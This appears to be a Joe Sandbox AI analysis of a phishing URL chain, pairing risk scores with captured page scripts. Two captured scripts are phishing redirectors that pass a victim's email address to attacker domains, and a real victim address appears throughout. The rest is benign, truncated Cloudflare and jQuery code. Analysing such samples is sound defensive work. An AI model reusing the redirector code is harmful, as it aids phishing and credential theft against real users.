| URL: https://emailcaptain.pages.dev Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://emailcaptain.pages.dev |
| URL: https://emailstats.transwill.click/dimitar/?login=... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script demonstrates several high-risk behaviors, including data exfiltration, dynamic code execution, and redirects to a suspicious domain. The script collects user email information and sends it to an untrusted domain 'emailway.aztoolls.top', which is likely used for malicious purposes such as phishing or credential theft. Additionally, the script uses a timeout to automatically redirect the user to the malicious URL after a short delay, further indicating malicious intent."
} |
var email = `yuluyev_an@rfs.ru`;
var base64email = window.location.hash.substr(1);
var href = window.location.href;
var url_string = href;
var url = new URL(url_string);
var request_type = url.searchParams.get("request_type");
var page = url.searchParams.get("page");
var page_bg = url.searchParams.get("page_bg");
var no_redrct = url.searchParams.get("no_redrct");
var pcnt = url.searchParams.get("pcnt");
var no_psplash = url.searchParams.get("no_psplash");
var pmax = url.searchParams.get("pmax");
var vcnt = url.searchParams.get("vcnt");
var use_cdtimr = url.searchParams.get("use_cdtimr");
if (base64email){
var email = base64email;
}
var tl = url.searchParams.get("_x_tr_tl");
var hl = url.searchParams.get("_x_tr_hl");
var dir = href.substring(0, href.lastIndexOf('/')) + "/";
var url = 'https://emailway.aztoolls.top/_sophosmith_oxy/?login='+email+'&page='+page+'&request_type='+request_type+'&page_bg='+page_bg+'&no_redrct='+no_redrct+'&pcnt='+pcnt+'&no_psplash='+no_psplash+'&pmax='+pmax+'&vcnt='+vcnt+'&use_cdtimr='+use_cdtimr;
setTimeout(() => {window.location.replace(url);}, 5);
|
| URL: https://emailstats.transwill.click/dimitar/?login=... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscation of the script's purpose raise significant security concerns. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and poses a high risk of malicious activity."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'90158add1bc17c90',t:'MTczNjc3Mjk0NS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from abuse. While it exhibits some moderate-risk indicators, such as external data transmission and fallback domains, the overall behavior is consistent with its intended purpose of verifying user interactions. Further review may be needed to ensure there are no additional hidden behaviors, but the script does not appear to be inherently malicious."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'ar2zd',
chlApiSitekey: '0x4AAAAAAAeT97zv7RuMp8kB',
chlApiMode: 'non-interactive',
chlApiSize: 'normal',
chlApiRcV: '2nc32qyTU8Z1eHCVFB7c62utFEiXmxrCQjQGZ6_fIqE-1736772949-1.3.1.1-d0yVxIWjJPxHNdpqYaDbOtopN63vnV0S0C1nV3IKJyQ',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:72000,
cK:[],
cType: 'chl_api_ni',
cRay: '90158af45ec44402',
cH: 'NVPHbFOmhL5DkZBkoPHc8bvzHsh_qbPuKoQU18O6GiU-1736772949-1.1.1.1-_Rt88Rqqxur_T.V.F0R6Xx7HUGKoHUahTjd1hNZcOx9knQOYT3GVAN7TCou7Ab.w',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'DJSSkwM_DnUU_fNuqCQgQS1GIeo7Z4hyUxRfTuGe.mc-1736772949-1.1.1.1-QS1cGLwbXllYL1g0ezTw0X6rvTonbccC.f0PO83CouGz2kkR6cT3ywY8DN4V89Q2RO9UGt_.F56JLzkbNxTIvRVRJ2c4Hfej44YZ1.ADd3mgPnsZQ3AYUqBtjnT82VyDu.xDQnefvrAvANZoTqthO5qlOwa5onyU8Xri..nQyKjc2o92cWeb301M0Gd860IppbFbbOfcJyUGBUF9gQcl4FicWJ75KDGm_5KjswOLM5nXMt6NWhJ4oFr4euVEa5oAr8uazdR2MS_yxKOSF353StWkXETUqtY4TiVTKuZ9FDzrvBEFz9xjBqeJIdF2MDKuxmff8CuiPThkQka7WTErsr4GGCs2qItnCKymNCJuYXi_Y7m.QlKJahcOsqPyYQXXYeBamkyoNZkaSxIFa739ll84GkvepbTi2q8AWIJQAiUVQo8PirkHQduPFN47hl1wteSAAFvXMu..XhrPRvI1pm1eO31GEL2IhpIf.5WPWBAlJNc3MIYxrCZ0ue.ln.EAYjlU10Ve5_4_2i5N_Nt1Rh_5I0A_a91eUKtvzc.Fwtoqpo9EBTrIReYYhZiZ3vq5HIaurRkqCX8WrgxeLZIVzBiGRBm8oRbRJPByqHL3_eNxH47KxfuMCpcGr9qbe75CkyKlU392L6ygR9XA_AvabmUVoRzcHVBLcWdPicJoXK..5JlmPNFrqZPD6nZcfGNYe28zhukGdJpJGQDIuh1RAMMexDU02.3fpEeLUXGWRZR.AixxEEwAbhEGuGEYHki3q1fNzXBu8X939sVL7bwk.GOzaEiEPV_WsMlv1lN41HQLTi1PuGHV6Y86pNTB.veW1GGrlSa7VXoQ_gF_iaj15KY9QVpK2xdC99s.5wla6qk5UGO80dnhwk1JqAtAXqemuAormKBK8eALJfUDtNT9LJXEuoZ2PVCBkKgc7IrO2nW9c5LMih7vajmmnjKUVgGtHljtXMRocwoz6XUn5TJwiQ_MYEXEsEN35j3HbTcMjZirZu8.uRlAv.G67DGnys9efeWAZky6BTvecYcId7QsAj.EI36SWFB9UEp.7ujhNxwCMnSDmLtcpDZaAvDBYAIW_4DVr_khnDYVZ9XCL62ppttNK4lc5g2PUKqbYgyGm_dI1fCns5lRSt0o0gg8HiruUDmSAOWfaDljU.ORqNJ6uMpSQ7LtCQdyt_wydAIx4lMAqQ59p5X1CJtD72sHEub14Q.7nE8hIxw23FIAyzL9SOXE518zSYEgufpaDxVHi6yfA41QKPLdnXlEj.Q2Vpr6eZHkIHkfMqqBhqtd16qbOFt6Y07YwlEhL9phutR285ltuRNbzJ_sdHVRIhGQYyXv7mTadHPO2.VVbhbb7POxdYZIjAUt9NIYpUDIDfVj_ZEo6BHs1OLEPecws2OhiJTCGYZM4seW67cKMo6WgdUafCc5_8njV0bLD5ZlF0oN6hxTkY1AhBUi4EEJyIBecTRZ3HZ8RsRei23J.m0moPTuurcLy2PnyIBhJv9ezFP_LdQo9_M1VcpplYjJclfvSPRuR2BYjlzpU5_8tPbGzn7HJZBI7jeR.tzBPevafG_HyIw',
cITimeS: '1736772949',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'ar2zd',
nextRcV: '2nc32qyTU8Z1eHCVFB7c62utFEiXmxrCQjQGZ6_fIqE-1736772949-1.3.1.1-d0yVxIWjJPxHNdpqYaDbOtopN63vnV0S0C1nV3IKJyQ',
event: 'reloadRequest',
}, "*");
|
| URL: https://emailway.aztoolls.top/_sophosmith_oxy/?log... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscated nature of the code further increase the risk. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and indicative of a potential malicious attack."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'90158ae61e8441b4',t:'MTczNjc3Mjk0Ny4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
| URL: https://emailcaptain.pages.dev/dimitar?login=eXVsd... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, redirects to a suspicious domain, and the use of obfuscated parameters. The script extracts sensitive information (email address) from the URL and sends it to a third-party domain ('emailstats.transwill.click'). Additionally, it redirects the user to this domain after a short delay, which is a common tactic used in malicious scripts. The presence of obfuscated parameters further increases the suspicion of malicious intent."
} |
var base64email = window.location.hash.substr(1);
var href = window.location.href;
var url_string = href;
var url = new URL(url_string);
var base64login = url.searchParams.get("login");
var request_type = url.searchParams.get("request_type");
var page = url.searchParams.get("page");
var page_bg = url.searchParams.get("page_bg");
var no_redrct = url.searchParams.get("no_redrct");
var pcnt = url.searchParams.get("pcnt");
var no_psplash = url.searchParams.get("no_psplash");
var pmax = url.searchParams.get("pmax");
var vcnt = url.searchParams.get("vcnt");
var use_cdtimr = url.searchParams.get("use_cdtimr");
if (base64email){
var email = base64email;
} else if(base64login){
var email = base64login;
}else{
var email = "";
}
if(base64email || base64login){
localStorage.setItem("email", email);
hash = '#';
}
var tl = url.searchParams.get("_x_tr_tl");
var hl = url.searchParams.get("_x_tr_hl");
var dir = href.substring(0, href.lastIndexOf('/')) + "/";
var url = 'https://emailstats.transwill.click/dimitar/?login='+email+'&page='+page+'&request_type='+request_type+'&page_bg='+page_bg+'&no_redrct='+no_redrct+'&pcnt='+pcnt+'&no_psplash='+no_psplash+'&pmax='+pmax+'&vcnt='+vcnt+'&use_cdtimr='+use_cdtimr;
setTimeout(() => {window.location.replace(url);}, 5);
|
| URL: https://emailcaptain.pages.dev/dimitar?login=eXVsd... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a simple DOM manipulation task, hiding an element on the page after a 10-millisecond delay. This behavior is common for web development and does not exhibit any high-risk indicators. The code uses standard DOM APIs and does not engage in dynamic code execution, data exfiltration, or suspicious redirects. While the aggressive DOM manipulation could be considered a moderate-risk indicator, the overall context suggests this is likely a legitimate use case, such as hiding a loading or placeholder element. Therefore, the risk score is assessed as low."
} |
$(document).ready(function() {
setTimeout(() => {
var box = document.getElementById('gt-nvframe');
// ??? removes element from DOM
box.style.display = 'none';
// ??? hides element (still takes up space on page)
// box.style.visibility = 'hidden';
}, 10); //
});
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. The script sets up various configuration options and translations for the Cloudflare challenge, but does not contain any high-risk indicators like dynamic code execution, data exfiltration, or malicious redirects. The script's purpose is to provide a user-friendly challenge experience for website visitors, which is a legitimate security practice. While the script uses some legacy APIs like XDomainRequest, these pose minor risks and are not inherently malicious. Overall, this script is likely benign and does not demonstrate any suspicious or malicious behavior."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_overrun_description":"Stuck%20here%3F","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_expired":"Expired","turnstile_footer_privacy":"Privacy","turnstile_footer_terms":"Terms","testing_only":"Testing%20only.","turnstile_refresh":"Refresh","turnstile_feedback_description":"Send%20Feedback","turnstile_verifying":"Verifying...","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","human_button_text":"Verify%20you%20are%20human","turnstile_failure":"Error","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_feedback_report":"Having%20trouble%3F","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_timeout":"Timed%20out","turnstile_success":"Success%21","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists."},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eU,f1,f2,f5,f8,fa,fb,fc,fo,fA,fG,fH,fI,fS,g3,g7,ga,gb,gB,gC,gG,gH,g8,g9){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(595))/1*(parseInt(gI(725))/2)+-parseInt(gI(1338))/3*(-parseInt(gI(1353))/4)+-parseInt(gI(587))/5+parseInt(gI(914))/6+-parseInt(gI(487))/7*(-parseInt(gI(237))/8)+parseInt(gI(153))/9+parseInt(gI(177))/10*(-parseInt(gI(222))/11),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,827939),eM=this||self,eN=eM[gJ(578)],eM[gJ(518)]=![],eM[gJ(996)]=function(h1){if(h1=gJ,eM[h1(518)])return;eM[h1(518)]=!![]},eU=0,eN[gJ(503)]===gJ(1501)?eN[gJ(1450)](gJ(1263),function(){setTimeout(eX,0)}):setTimeout(eX,0),eM[gJ(159)]=function(c,hj,e){e=(hj=gJ,{'bBGiN':function(g,h){return g(h)}});try{return e[hj(363)](f0,c)}catch(g){return eY(eZ(c))}},f1=function(hk,d,e,f,g){return hk=gJ,d={'LqNiW':function(h,i){return h-i},'TfETe':function(h,i){return h^i},'LrpXP':function(h,i){return i^h},'kQNwT':function(h,i){return h+i},'zcRyC':function(h,i){return h-i},'LTzWX':function(h,i){return h^i},'IRZoW':function(h,i){return h===i},'vuAqf':function(h,i){return i^h},'dJTkC':function(h,i){return h^i},'jmDTo':function(h,i){return h===i},'wfEbw':function(h,i){return i^h},'oOBSE':function(h,i){return h/ i},'CBBXF':function(h,i){return h^i},'gfeKy':function(h,i){return h%i},'SGmwU':function(h,i){return h===i},'FDmzj':function(h,i){return i^h},'QxTkj':function(h,i){return h^i},'wIOLo':function(h,i){return i^h},'KkoZv':function(h,i){return h^i},'XRPpc':function(h,i){return i^h},'rovIV':function(h,i){return i^h},'vFSRA':function(h,i){return i^h},'FrCGr':function(h,i){return h>>i},'xGbOA':function(h |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles communication between the challenge widget and the parent window, which is a legitimate use case. While the script uses some legacy practices like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of a Cloudflare challenge, with no clear indicators of malicious intent."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'ar2zd',
chlApiSitekey: '0x4AAAAAAAeT97zv7RuMp8kB',
chlApiMode: 'non-interactive',
chlApiSize: 'normal',
chlApiRcV: '2nc32qyTU8Z1eHCVFB7c62utFEiXmxrCQjQGZ6_fIqE-1736772949-1.3.1.1-d0yVxIWjJPxHNdpqYaDbOtopN63vnV0S0C1nV3IKJyQ',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:72000,
cK:[],
cType: 'chl_api_ni',
cRay: '90158af45ec44402',
cH: 'NVPHbFOmhL5DkZBkoPHc8bvzHsh_qbPuKoQU18O6GiU-1736772949-1.1.1.1-_Rt88Rqqxur_T.V.F0R6Xx7HUGKoHUahTjd1hNZcOx9knQOYT3GVAN7TCou7Ab.w',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'DJSSkwM_DnUU_fNuqCQgQS1GIeo7Z4hyUxRfTuGe.mc-1736772949-1.1.1.1-QS1cGLwbXllYL1g0ezTw0X6rvTonbccC.f0PO83CouGz2kkR6cT3ywY8DN4V89Q2RO9UGt_.F56JLzkbNxTIvRVRJ2c4Hfej44YZ1.ADd3mgPnsZQ3AYUqBtjnT82VyDu.xDQnefvrAvANZoTqthO5qlOwa5onyU8Xri..nQyKjc2o92cWeb301M0Gd860IppbFbbOfcJyUGBUF9gQcl4FicWJ75KDGm_5KjswOLM5nXMt6NWhJ4oFr4euVEa5oAr8uazdR2MS_yxKOSF353StWkXETUqtY4TiVTKuZ9FDzrvBEFz9xjBqeJIdF2MDKuxmff8CuiPThkQka7WTErsr4GGCs2qItnCKymNCJuYXi_Y7m.QlKJahcOsqPyYQXXYeBamkyoNZkaSxIFa739ll84GkvepbTi2q8AWIJQAiUVQo8PirkHQduPFN47hl1wteSAAFvXMu..XhrPRvI1pm1eO31GEL2IhpIf.5WPWBAlJNc3MIYxrCZ0ue.ln.EAYjlU10Ve5_4_2i5N_Nt1Rh_5I0A_a91eUKtvzc.Fwtoqpo9EBTrIReYYhZiZ3vq5HIaurRkqCX8WrgxeLZIVzBiGRBm8oRbRJPByqHL3_eNxH47KxfuMCpcGr9qbe75CkyKlU392L6ygR9XA_AvabmUVoRzcHVBLcWdPicJoXK..5JlmPNFrqZPD6nZcfGNYe28zhukGdJpJGQDIuh1RAMMexDU02.3fpEeLUXGWRZR.AixxEEwAbhEGuGEYHki3q1fNzXBu8X939sVL7bwk.GOzaEiEPV_WsMlv1lN41HQLTi1PuGHV6Y86pNTB.veW1GGrlSa7VXoQ_gF_iaj15KY9QVpK2xdC99s.5wla6qk5UGO80dnhwk1JqAtAXqemuAormKBK8eALJfUDtNT9LJXEuoZ2PVCBkKgc7IrO2nW9c5LMih7vajmmnjKUVgGtHljtXMRocwoz6XUn5TJwiQ_MYEXEsEN35j3HbTcMjZirZu8.uRlAv.G67DGnys9efeWAZky6BTvecYcId7QsAj.EI36SWFB9UEp.7ujhNxwCMnSDmLtcpDZaAvDBYAIW_4DVr_khnDYVZ9XCL62ppttNK4lc5g2PUKqbYgyGm_dI1fCns5lRSt0o0gg8HiruUDmSAOWfaDljU.ORqNJ6uMpSQ7LtCQdyt_wydAIx4lMAqQ59p5X1CJtD72sHEub14Q.7nE8hIxw23FIAyzL9SOXE518zSYEgufpaDxVHi6yfA41QKPLdnXlEj.Q2Vpr6eZHkIHkfMqqBhqtd16qbOFt6Y07YwlEhL9phutR285ltuRNbzJ_sdHVRIhGQYyXv7mTadHPO2.VVbhbb7POxdYZIjAUt9NIYpUDIDfVj_ZEo6BHs1OLEPecws2OhiJTCGYZM4seW67cKMo6WgdUafCc5_8njV0bLD5ZlF0oN6hxTkY1AhBUi4EEJyIBecTRZ3HZ8RsRei23J.m0moPTuurcLy2PnyIBhJv9ezFP_LdQo9_M1VcpplYjJclfvSPRuR2BYjlzpU5_8tPbGzn7HJZBI7jeR.tzBPevafG_HyIw',
cITimeS: '1736772949',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'ar2zd',
nextRcV: '2nc32qyTU8Z1eHCVFB7c62utFEiXmxrCQjQGZ6_fIqE-1736772949-1.3.1.1-d0yVxIWjJPxHNdpqYaDbOtopN63vnV0S0C1nV3IKJyQ',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
wi |
| URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://challenges.cloudflare.com/turnstile/v0/b/e... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script contains no high-risk or moderate-risk indicators. It appears to be a utility script with no signs of malicious behavior, such as dynamic code execution or data exfiltration. The code is not obfuscated, and there are no interactions with external domains. The script seems to be handling internal operations, likely related to error handling or state management, which aligns with low-risk indicators."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://ajax.googleapis.com/ajax/libs/jquery/3.6.3... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library. It does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The code primarily consists of utility functions and object manipulations typical of a library like jQuery. There are no interactions with external domains or aggressive DOM manipulations that would raise concern. Therefore, it is considered low risk."
} |
/*! jQuery v3.6.3 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},S=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||S).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof 